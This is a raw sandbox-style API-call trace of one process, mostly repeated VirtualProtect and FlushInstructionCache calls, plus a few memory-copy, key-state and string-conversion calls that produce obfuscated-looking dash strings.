1 [0113.760] VirtualProtect (in: lpAddress=0xcadc898, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.761] GetCurrentProcess () returned 0xffffffff [0113.761] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc899, dwSize=0x2) returned 1 [0113.761] GetCurrentProcess () returned 0xffffffff [0113.761] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b8, dwSize=0x14) returned 1 [0113.761] VirtualProtect (in: lpAddress=0xcadc8b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.761] GetCurrentProcess () returned 0xffffffff [0113.761] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b9, dwSize=0x2) returned 1 [0113.761] GetCurrentProcess () returned 0xffffffff [0113.761] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d8, dwSize=0x14) returned 1 [0113.761] VirtualProtect (in: lpAddress=0xcadc8d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.762] GetCurrentProcess () returned 0xffffffff [0113.762] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d9, dwSize=0x2) returned 1 [0113.762] GetCurrentProcess () returned 0xffffffff [0113.762] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f8, dwSize=0x14) returned 1 [0113.762] VirtualProtect (in: lpAddress=0xcadc8f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.762] GetCurrentProcess () returned 0xffffffff [0113.762] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f9, dwSize=0x2) returned 1 [0113.763] GetCurrentProcess () returned 0xffffffff [0113.763] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc918, dwSize=0x14) returned 1 [0113.763] VirtualProtect (in: lpAddress=0xcadc918, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.763] GetCurrentProcess () returned 0xffffffff [0113.763] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc919, dwSize=0x2) returned 1 [0113.763] GetCurrentProcess () returned 0xffffffff [0113.763] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc938, dwSize=0x14) returned 1 [0113.763] VirtualProtect (in: lpAddress=0xcadc938, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.764] GetCurrentProcess () returned 0xffffffff [0113.764] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc939, dwSize=0x2) returned 1 [0113.764] GetCurrentProcess () returned 0xffffffff [0113.764] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc958, dwSize=0x14) returned 1 [0113.764] VirtualProtect (in: lpAddress=0xcadc958, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.764] GetCurrentProcess () returned 0xffffffff [0113.764] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc959, dwSize=0x2) returned 1 [0113.764] GetCurrentProcess () returned 0xffffffff [0113.764] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc978, dwSize=0x14) returned 1 [0113.764] VirtualProtect (in: lpAddress=0xcadc978, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.765] GetCurrentProcess () returned 0xffffffff [0113.765] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc979, dwSize=0x2) returned 1 [0113.765] GetCurrentProcess () returned 0xffffffff [0113.765] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc998, dwSize=0x14) returned 1 [0113.765] VirtualProtect (in: lpAddress=0xcadc998, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.765] GetCurrentProcess () returned 0xffffffff [0113.766] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc999, dwSize=0x2) returned 1 [0113.766] GetCurrentProcess () returned 0xffffffff [0113.766] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b8, dwSize=0x14) returned 1 [0113.766] VirtualProtect (in: lpAddress=0xcadc9b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.766] GetCurrentProcess () returned 0xffffffff [0113.766] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b9, dwSize=0x2) returned 1 [0113.766] GetCurrentProcess () returned 0xffffffff [0113.766] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d8, dwSize=0x14) returned 1 [0113.766] VirtualProtect (in: lpAddress=0xcadc9d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.767] GetCurrentProcess () returned 0xffffffff [0113.767] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d9, dwSize=0x2) returned 1 [0113.767] GetCurrentProcess () returned 0xffffffff [0113.767] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f8, dwSize=0x14) returned 1 [0113.767] VirtualProtect (in: lpAddress=0xcadc9f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.767] GetCurrentProcess () returned 0xffffffff [0113.767] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f9, dwSize=0x2) returned 1 [0113.767] GetCurrentProcess () returned 0xffffffff [0113.767] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca18, dwSize=0x14) returned 1 [0113.767] VirtualProtect (in: lpAddress=0xcadca18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.768] GetCurrentProcess () returned 0xffffffff [0113.768] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca19, dwSize=0x2) returned 1 [0113.768] GetCurrentProcess () returned 0xffffffff [0113.768] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca38, dwSize=0x14) returned 1 [0113.768] VirtualProtect (in: lpAddress=0xcadca38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.769] GetCurrentProcess () returned 0xffffffff [0113.769] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca39, dwSize=0x2) returned 1 [0113.769] GetCurrentProcess () returned 0xffffffff [0113.769] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca58, dwSize=0x14) returned 1 [0113.769] VirtualProtect (in: lpAddress=0xcadca58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.770] GetCurrentProcess () returned 0xffffffff [0113.770] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca59, dwSize=0x2) returned 1 [0113.770] GetCurrentProcess () returned 0xffffffff [0113.770] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca78, dwSize=0x14) returned 1 [0113.770] VirtualProtect (in: lpAddress=0xcadca78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.770] GetCurrentProcess () returned 0xffffffff [0113.770] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca79, dwSize=0x2) returned 1 [0113.770] GetCurrentProcess () returned 0xffffffff [0113.770] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e0, dwSize=0x14) returned 1 [0113.770] VirtualProtect (in: lpAddress=0xcadb0e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.771] GetCurrentProcess () returned 0xffffffff [0113.771] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e1, dwSize=0x2) returned 1 [0113.771] GetCurrentProcess () returned 0xffffffff [0113.771] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb100, dwSize=0x14) returned 1 [0113.771] VirtualProtect (in: lpAddress=0xcadb100, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.772] GetCurrentProcess () returned 0xffffffff [0113.772] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb101, dwSize=0x2) returned 1 [0113.772] GetCurrentProcess () returned 0xffffffff [0113.772] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb120, dwSize=0x14) returned 1 [0113.772] VirtualProtect (in: lpAddress=0xcadb120, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0113.772] GetCurrentProcess () returned 0xffffffff [0113.772] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb121, dwSize=0x2) returned 1 [0113.773] GetAsyncKeyState (vKey=3) returned 0 [0113.773] VarCmp (pvarLeft=0x197d98, pvarRight=0x197d88, lcid=0x0, dwFlags=0x30001) returned 0x1 [0113.773] CRetailMalloc_Alloc () returned 0xcb00de8 [0113.773] memcpy (in: _Dst=0xb754f48, _Src=0x197508, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.773] memcpy (in: _Dst=0xb755050, _Src=0x197524, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0113.775] memcpy (in: _Dst=0xb754f48, _Src=0x197508, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302db2, cbMultiByte=32, lpWideCharStr=0x197324, cchWideChar=33 | out: lpWideCharStr="–———–—–—–––—–––—–—–––––—––––—––") returned 32 [0113.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c034e, cbMultiByte=32, lpWideCharStr=0x197384, cchWideChar=33 | out: lpWideCharStr="–———–—–—–––—–––—–—–––––—––––—––") returned 32 [0113.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c034e, cbMultiByte=32, lpWideCharStr=0x197384, cchWideChar=33 | out: lpWideCharStr="–———–—–—–––—–––—–—–––––—––––—––") returned 32 [0113.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c034e, cbMultiByte=32, lpWideCharStr=0x197384, cchWideChar=33 | out: lpWideCharStr="–———–—–—–––—–––—–—–––––—––––—––") returned 32 [0113.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c034e, cbMultiByte=32, lpWideCharStr=0x197384, cchWideChar=33 | out: lpWideCharStr="–———–—–—–––—–––—–—–––––—––––—––") returned 32 [0113.775] CRetailMalloc_Alloc () returned 0xc843080 [0113.775] _mbscpy_s (in: _Dst=0xc843080, _DstSizeInBytes=0x20, _Src=0x112c034e | out: _Dst=0xc843080) returned 0x0 [0113.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0b92, cbMultiByte=39, lpWideCharStr=0x197394, cchWideChar=40 | out: lpWideCharStr="_B_var_–———–—–—–––—–––—–—–––––—––––—––") returned 39 [0113.776] _mbscpy_s (in: _Dst=0x1973fc, _DstSizeInBytes=0x20, _Src=0x112c034e | out: _Dst=0x1973fc) returned 0x0 [0113.776] CRetailMalloc_Free () returned 0x1 [0113.776] memcpy (in: _Dst=0xb755050, _Src=0xb755050, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0113.776] memcpy (in: _Dst=0xb754f48, _Src=0x197508, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.777] memcpy (in: _Dst=0xb754f48, _Src=0x197374, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.777] memcpy (in: _Dst=0xb754f48, _Src=0x197374, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.777] CRetailMalloc_Realloc () returned 0xcaddf68 [0113.777] memcpy (in: _Dst=0xb754f48, _Src=0x197374, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.777] memcpy (in: _Dst=0xb754f48, _Src=0x197508, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.777] memcpy (in: _Dst=0xb754f48, _Src=0x197508, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.777] memcpy (in: _Dst=0xcb00e68, _Src=0x1975a4, _Size=0x18 | out: _Dst=0xcb00e68) returned 0xcb00e68 [0113.777] CRetailMalloc_Realloc () returned 0xcb00de8 [0113.777] CRetailMalloc_Free () returned 0x1 [0113.777] GetCurrentProcess () returned 0xffffffff [0113.777] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912074, dwSize=0x14) returned 1 [0113.777] VirtualProtect (in: lpAddress=0xc912074, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.778] GetCurrentProcess () returned 0xffffffff [0113.778] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912075, dwSize=0x2) returned 1 [0113.778] GetCurrentProcess () returned 0xffffffff [0113.778] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912094, dwSize=0x14) returned 1 [0113.778] VirtualProtect (in: lpAddress=0xc912094, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.779] GetCurrentProcess () returned 0xffffffff [0113.779] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912095, dwSize=0x2) returned 1 [0113.779] GetCurrentProcess () returned 0xffffffff [0113.779] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b4, dwSize=0x14) returned 1 [0113.779] VirtualProtect (in: lpAddress=0xc9120b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.779] GetCurrentProcess () returned 0xffffffff [0113.779] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b5, dwSize=0x2) returned 1 [0113.779] GetCurrentProcess () returned 0xffffffff [0113.779] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d4, dwSize=0x14) returned 1 [0113.779] VirtualProtect (in: lpAddress=0xc9120d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.780] GetCurrentProcess () returned 0xffffffff [0113.780] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d5, dwSize=0x2) returned 1 [0113.780] GetCurrentProcess () returned 0xffffffff [0113.780] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f4, dwSize=0x14) returned 1 [0113.780] VirtualProtect (in: lpAddress=0xc9120f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.780] GetCurrentProcess () returned 0xffffffff [0113.781] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f5, dwSize=0x2) returned 1 [0113.781] GetCurrentProcess () returned 0xffffffff [0113.781] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912114, dwSize=0x14) returned 1 [0113.781] VirtualProtect (in: lpAddress=0xc912114, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.781] GetCurrentProcess () returned 0xffffffff [0113.781] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912115, dwSize=0x2) returned 1 [0113.781] GetCurrentProcess () returned 0xffffffff [0113.781] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912134, dwSize=0x14) returned 1 [0113.781] VirtualProtect (in: lpAddress=0xc912134, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.782] GetCurrentProcess () returned 0xffffffff [0113.782] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912135, dwSize=0x2) returned 1 [0113.782] GetCurrentProcess () returned 0xffffffff [0113.782] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912154, dwSize=0x14) returned 1 [0113.782] VirtualProtect (in: lpAddress=0xc912154, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.782] GetCurrentProcess () returned 0xffffffff [0113.782] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912155, dwSize=0x2) returned 1 [0113.782] GetCurrentProcess () returned 0xffffffff [0113.782] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912174, dwSize=0x14) returned 1 [0113.782] VirtualProtect (in: lpAddress=0xc912174, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.783] GetCurrentProcess () returned 0xffffffff [0113.783] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912175, dwSize=0x2) returned 1 [0113.783] GetCurrentProcess () returned 0xffffffff [0113.783] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912194, dwSize=0x14) returned 1 [0113.783] VirtualProtect (in: lpAddress=0xc912194, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.783] GetCurrentProcess () returned 0xffffffff [0113.783] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912195, dwSize=0x2) returned 1 [0113.783] GetCurrentProcess () returned 0xffffffff [0113.784] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b4, dwSize=0x14) returned 1 [0113.784] VirtualProtect (in: lpAddress=0xc9121b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.793] GetCurrentProcess () returned 0xffffffff [0113.794] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b5, dwSize=0x2) returned 1 [0113.794] GetCurrentProcess () returned 0xffffffff [0113.794] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d4, dwSize=0x14) returned 1 [0113.794] VirtualProtect (in: lpAddress=0xc9121d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.795] GetCurrentProcess () returned 0xffffffff [0113.795] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d5, dwSize=0x2) returned 1 [0113.795] GetCurrentProcess () returned 0xffffffff [0113.795] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc898, dwSize=0x14) returned 1 [0113.795] VirtualProtect (in: lpAddress=0xcadc898, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.795] GetCurrentProcess () returned 0xffffffff [0113.795] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc899, dwSize=0x2) returned 1 [0113.795] GetCurrentProcess () returned 0xffffffff [0113.795] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b8, dwSize=0x14) returned 1 [0113.795] VirtualProtect (in: lpAddress=0xcadc8b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.796] GetCurrentProcess () returned 0xffffffff [0113.796] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b9, dwSize=0x2) returned 1 [0113.796] GetCurrentProcess () returned 0xffffffff [0113.796] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d8, dwSize=0x14) returned 1 [0113.796] VirtualProtect (in: lpAddress=0xcadc8d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.797] GetCurrentProcess () returned 0xffffffff [0113.797] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d9, dwSize=0x2) returned 1 [0113.797] GetCurrentProcess () returned 0xffffffff [0113.797] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f8, dwSize=0x14) returned 1 [0113.797] VirtualProtect (in: lpAddress=0xcadc8f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.797] GetCurrentProcess () returned 0xffffffff [0113.797] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f9, dwSize=0x2) returned 1 [0113.797] GetCurrentProcess () returned 0xffffffff [0113.797] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc918, dwSize=0x14) returned 1 [0113.797] VirtualProtect (in: lpAddress=0xcadc918, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.798] GetCurrentProcess () returned 0xffffffff [0113.798] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc919, dwSize=0x2) returned 1 [0113.798] GetCurrentProcess () returned 0xffffffff [0113.798] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc938, dwSize=0x14) returned 1 [0113.798] VirtualProtect (in: lpAddress=0xcadc938, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.798] GetCurrentProcess () returned 0xffffffff [0113.798] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc939, dwSize=0x2) returned 1 [0113.798] GetCurrentProcess () returned 0xffffffff [0113.799] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc958, dwSize=0x14) returned 1 [0113.799] VirtualProtect (in: lpAddress=0xcadc958, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.799] GetCurrentProcess () returned 0xffffffff [0113.799] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc959, dwSize=0x2) returned 1 [0113.799] GetCurrentProcess () returned 0xffffffff [0113.799] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc978, dwSize=0x14) returned 1 [0113.799] VirtualProtect (in: lpAddress=0xcadc978, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.799] GetCurrentProcess () returned 0xffffffff [0113.799] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc979, dwSize=0x2) returned 1 [0113.799] GetCurrentProcess () returned 0xffffffff [0113.800] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc998, dwSize=0x14) returned 1 [0113.800] VirtualProtect (in: lpAddress=0xcadc998, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.804] GetCurrentProcess () returned 0xffffffff [0113.804] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc999, dwSize=0x2) returned 1 [0113.804] GetCurrentProcess () returned 0xffffffff [0113.804] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b8, dwSize=0x14) returned 1 [0113.804] VirtualProtect (in: lpAddress=0xcadc9b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.805] GetCurrentProcess () returned 0xffffffff [0113.805] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b9, dwSize=0x2) returned 1 [0113.805] GetCurrentProcess () returned 0xffffffff [0113.805] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d8, dwSize=0x14) returned 1 [0113.805] VirtualProtect (in: lpAddress=0xcadc9d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.806] GetCurrentProcess () returned 0xffffffff [0113.806] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d9, dwSize=0x2) returned 1 [0113.806] GetCurrentProcess () returned 0xffffffff [0113.806] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f8, dwSize=0x14) returned 1 [0113.806] VirtualProtect (in: lpAddress=0xcadc9f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.806] GetCurrentProcess () returned 0xffffffff [0113.806] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f9, dwSize=0x2) returned 1 [0113.806] GetCurrentProcess () returned 0xffffffff [0113.806] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca18, dwSize=0x14) returned 1 [0113.806] VirtualProtect (in: lpAddress=0xcadca18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.807] GetCurrentProcess () returned 0xffffffff [0113.807] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca19, dwSize=0x2) returned 1 [0113.807] GetCurrentProcess () returned 0xffffffff [0113.807] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca38, dwSize=0x14) returned 1 [0113.807] VirtualProtect (in: lpAddress=0xcadca38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.807] GetCurrentProcess () returned 0xffffffff [0113.807] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca39, dwSize=0x2) returned 1 [0113.807] GetCurrentProcess () returned 0xffffffff [0113.807] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca58, dwSize=0x14) returned 1 [0113.807] VirtualProtect (in: lpAddress=0xcadca58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.808] GetCurrentProcess () returned 0xffffffff [0113.808] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca59, dwSize=0x2) returned 1 [0113.808] GetCurrentProcess () returned 0xffffffff [0113.808] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca78, dwSize=0x14) returned 1 [0113.808] VirtualProtect (in: lpAddress=0xcadca78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.808] GetCurrentProcess () returned 0xffffffff [0113.809] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca79, dwSize=0x2) returned 1 [0113.809] GetCurrentProcess () returned 0xffffffff [0113.809] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e0, dwSize=0x14) returned 1 [0113.809] VirtualProtect (in: lpAddress=0xcadb0e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.809] GetCurrentProcess () returned 0xffffffff [0113.809] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e1, dwSize=0x2) returned 1 [0113.809] GetCurrentProcess () returned 0xffffffff [0113.809] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb100, dwSize=0x14) returned 1 [0113.809] VirtualProtect (in: lpAddress=0xcadb100, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.810] GetCurrentProcess () returned 0xffffffff [0113.810] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb101, dwSize=0x2) returned 1 [0113.810] GetCurrentProcess () returned 0xffffffff [0113.810] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb120, dwSize=0x14) returned 1 [0113.810] VirtualProtect (in: lpAddress=0xcadb120, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0113.810] GetCurrentProcess () returned 0xffffffff [0113.810] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb121, dwSize=0x2) returned 1 [0113.811] GetAsyncKeyState (vKey=3) returned 0 [0113.811] GetAsyncKeyState (vKey=3) returned 0 [0113.812] CRetailMalloc_Alloc () returned 0xcb00ec0 [0113.812] memcpy (in: _Dst=0xb754f48, _Src=0x1973fc, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.812] memcpy (in: _Dst=0xcb00ee0, _Src=0x197464, _Size=0x18 | out: _Dst=0xcb00ee0) returned 0xcb00ee0 